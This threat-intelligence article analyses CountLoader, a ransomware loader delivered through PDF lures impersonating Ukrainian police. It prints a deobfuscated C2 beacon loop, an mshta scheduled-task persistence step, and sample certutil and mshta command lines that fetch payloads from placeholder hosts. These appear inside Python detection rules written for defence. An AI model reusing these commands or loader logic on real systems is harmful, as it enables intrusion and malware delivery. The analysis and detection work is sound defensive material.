In recent months, security teams have observed the emergence of a sophisticated malware loader, dubbed CountLoader, which leverages weaponized PDF files to deliver ransomware payloads.
First detected in late August 2025, CountLoader is linked to multiple Russian-speaking cybercriminal groups, including affiliates of LockBit, BlackBasta, and Qilin.
By masquerading as legitimate documents—often impersonating Ukrainian law enforcement—this loader takes advantage of social engineering and PDF exploit chains to gain an initial foothold in target environments.
CountLoader’s deployment methodology revolves around three distinct versions written in JScript (.hta), .NET, and PowerShell.
Each variant exhibits unique attributes: the JScript version offers the most comprehensive functionality with multiple download and execution methods, the .NET binary enforces a hardcoded kill switch after a preset date, and the PowerShell script is a concise loader that relies on reflective in-memory execution.
Silent Push analysts noted that all variants incorporate a custom C2 communication protocol that uses XOR and Base64 routines to obscure their control traffic.
The impact of CountLoader extends far beyond mere initial access. Upon successful execution, the loader fingerprints device-specific details—such as hardware identifiers, domain membership, and antivirus product presence—to generate a unique victim ID.
It then engages in persistent C2 polling loops, downloading secondary payloads such as Cobalt Strike beacons, Adaptix implants, and pureHVNC backdoors.
Organizations with domain-joined systems in Eastern Europe have been the primary targets, suggesting strategic selection of corporate and governmental entities.
CountLoader was notably delivered via a PDF-based phishing lure impersonating the National Police of Ukraine. The malicious PDF contained an embedded HTML application object that triggered mshta.exe to fetch and execute the JScript loader.
Upon opening the document, victims encountered an official-looking notification instructing them to “start your request” via an embedded link, which initiated the loader download process.
Infection Mechanism
CountLoader’s infection mechanism begins with the weaponized PDF exploiting user interaction rather than zero-day vulnerabilities.
The PDF embeds an HTA object that invokes the Windows mshta engine when clicked.
This HTA script is obfuscated using a free JavaScript obfuscator and contains around 850 lines of code.
After deobfuscation, the main loop responsible for C2 contact is visible:
    // Try the candidate C2 domains in turn until one acknowledges the victim fingerprint
    for (let i = 1; i <= 10; i++) {
        let c2Url = `https://ms-team-ping${i}.com/api/getFile?fn=CheckStatus`;
        let response = CheckStatusC2ReturnDecryptedResponse(c2Url, victimFingerprint);
        if (response === "success") {
            connectAndAuthenticate(c2Url.replace("CheckStatus", "connect"), victimFingerprint);
            break;
        }
    }

    // Scheduled task creation for persistence
    CreateScheduledTask({
        name: "GoogleUpdaterTaskSystem",
        command: `mshta https://${envVar}.example.com/start`,
        delay: "PT10M"
    });
Upon successful contact, CountLoader leverages HTTP POST requests with custom Bearer tokens obtained from the C2 to fetch tasks.
These tasks include downloading executables via WinHTTP, MSXML2, Curl, Bitsadmin, or Certutil, demonstrating the loader’s adaptability and deep system knowledge.
Once tasks are executed, CountLoader reports completion back to the server, ensuring robust task management.
This infection workflow underscores CountLoader’s design as a highly modular and persistent loader, capable of delivering diverse ransomware and post-exploitation tools while evading detection through obfuscation and encrypted communications.
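The delivery chain above (PDF lure invoking mshta.exe against a remote URL, a scheduled task that re-launches mshta, and LOLBin downloaders such as certutil, bitsadmin and curl) maps directly onto process-creation telemetry. The following Python is an added example written for this article, not code from Silent Push or from the loader itself; it runs a handful of detection rules over constructed Sysmon-style events, and the PDF reader process names and the placeholder hosts are assumptions.

```python
import re

# Constructed Sysmon-style process-creation events (image, parent, command line).
# Hosts and paths are placeholders, not real CountLoader indicators.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe", "parent": "AcroRd32.exe",
     "cmdline": "mshta https://c2.placeholder.invalid/start"},
    {"image": r"C:\Windows\System32\schtasks.exe", "parent": "mshta.exe",
     "cmdline": 'schtasks /create /tn GoogleUpdaterTaskSystem /sc once '
                '/tr "mshta https://c2.placeholder.invalid/start"'},
    {"image": r"C:\Windows\System32\certutil.exe", "parent": "mshta.exe",
     "cmdline": "certutil -urlcache -split -f https://c2.placeholder.invalid/p.exe "
                "C:\\Users\\Public\\p.exe"},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": "explorer.exe",
     "cmdline": r"mshta C:\Users\alice\Downloads\report.hta"},  # local HTA, no URL
    {"image": r"C:\Windows\System32\schtasks.exe", "parent": "cmd.exe",
     "cmdline": "schtasks /create /tn Backup /sc daily /tr C:\\Tools\\backup.exe"},
]

URL = re.compile(r'https?://[^\s"]+', re.I)
# Assumed PDF reader process names (not taken from the article).
PDF_READERS = {"acrord32.exe", "acrobat.exe", "foxitreader.exe"}
# Download utilities the article lists, with the switch that marks a fetch
# (curl needs only a URL, so its marker is the empty string).
LOLBIN_DOWNLOADERS = {"certutil.exe": "-urlcache", "bitsadmin.exe": "/transfer",
                      "curl.exe": ""}

def analyze(event):
    """Return [(rule, detail), ...] for one process-creation event."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd, low = event["cmdline"], event["cmdline"].lower()
    parent = event.get("parent", "").lower()
    url = URL.search(cmd)
    hits = []
    # Stage 1: the PDF lure's embedded HTA object hands a remote URL to mshta.exe.
    if image == "mshta.exe" and url:
        hits.append(("mshta_remote_hta", url.group(0)))
        if parent in PDF_READERS:
            hits.append(("pdf_reader_spawned_mshta", parent))
    # Persistence: a scheduled task whose action re-launches mshta against a URL.
    if image == "schtasks.exe" and "/create" in low and "mshta" in low and url:
        hits.append(("schtask_mshta_url", url.group(0)))
    # Stage 2: LOLBin download utilities pulling the next payload.
    marker = LOLBIN_DOWNLOADERS.get(image)
    if marker is not None and marker in low and url:
        hits.append(("lolbin_download", f"{image} {url.group(0)}"))
    return hits

def scan(events):
    """Run every rule over a list of events; returns [(event_index, (rule, detail))]."""
    return [(i, hit) for i, ev in enumerate(events) for hit in analyze(ev)]
```

Correlating these hits by parent process (mshta.exe spawning schtasks.exe and certutil.exe) turns single noisy matches into a high-confidence chain.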